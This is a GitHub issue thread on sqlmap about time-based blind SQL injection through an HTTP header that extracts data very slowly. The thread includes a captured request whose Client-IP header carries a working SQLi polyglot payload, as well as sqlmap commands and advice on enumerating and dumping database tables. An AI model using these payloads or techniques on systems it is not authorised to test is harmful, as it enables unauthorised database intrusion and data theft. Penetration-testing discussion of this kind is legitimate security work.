### ISSUE TITLE
Time-based extremely slow SQLI ( tweak needed ? )

### ISSUE THREAD

**Issue by ultr7as** [sqlmapproject/sqlmap#1604]
Hello dear community , I have a question for you. 
I'm trying to pentest a web application I work for and I am facing a significant issue . 
Since injection is based on http header I am using the following command . 
~sqlmap -r '/root/Desktop/headers.txt' --dbs 
which ends up finding the tables by 1 letter per ~24 seconds . 
However the issue is that even if I try the --time-sec or -o commands it looks like sqlmap overrides it by viewing the following message . 
~[01:48:27] [WARNING] time-based comparison requires larger statistical model, please wait..............................
~[01:48:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
~24

24 is the seconds that take between I get each letter for the databases name , so is there any way of getting it lower ? I mean , It takes like half an hour to enumerate 4 databases ( JUST THE NAMES  , nto to dump them) . 
P.S : Tried a very older version of sqlmap in case of version compatibility but still nothing I still get the 24 number ( which is obviously seconds I guess ) .
Looking forward for a reply , thanks in advance !

**Comment by ultr7as** [comment]
Here is the payload . Maybe sleep-time needs some tweaking ? 
GET /admin/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: if(now()=sysdate(),sleep(0),5)/*'XOR(if(now()=sysdate(),sleep(0),5))OR'"XOR(if(now()=sysdate(),sleep(0),5))OR"*/
X-Requested-With: XMLHttpRequest
Referer: http:/xxxxxx.xxx
Cookie: betSESSION=9729671gak876579jjat43ldj1
Host: bet.xxxxxx.xxx
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

**Comment by stamparm** [comment]
1) This is not true:

```
However the issue is that even if I try the --time-sec or -o commands it looks like sqlmap overrides it by viewing the following message .
~[01:48:27] [WARNING] time-based comparison requires larger statistical model, please wait..............................
~[01:48:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
```

Those are just warnings. Also, in case of `time-based comparison requires larger statistical model` sqlmap only perform DUMMY requests to get proper response times. Absolutely nothing to do with the SQL injection itself (to repeat, DUMMY requests)

2) `which ends up finding the tables by 1 letter per ~24 seconds . ` - this is most probably because your injection point is inside some OR-like or JOIN-like SQL statement. This produces multiple execution of time-based payload. Not sqlmap's fault

**Comment by ashishmathur71377** [comment]
i can found the tables name 
but can't found tables my sql-shell is working and what should i do next to get the tables name


[11:51:28] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> 
[12:09:35] [INFO] retrieved: 
[12:09:38] [WARNING] the SQL query provided does not return any output
[12:09:38] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
help me what should i do to dump the table name in mssql db
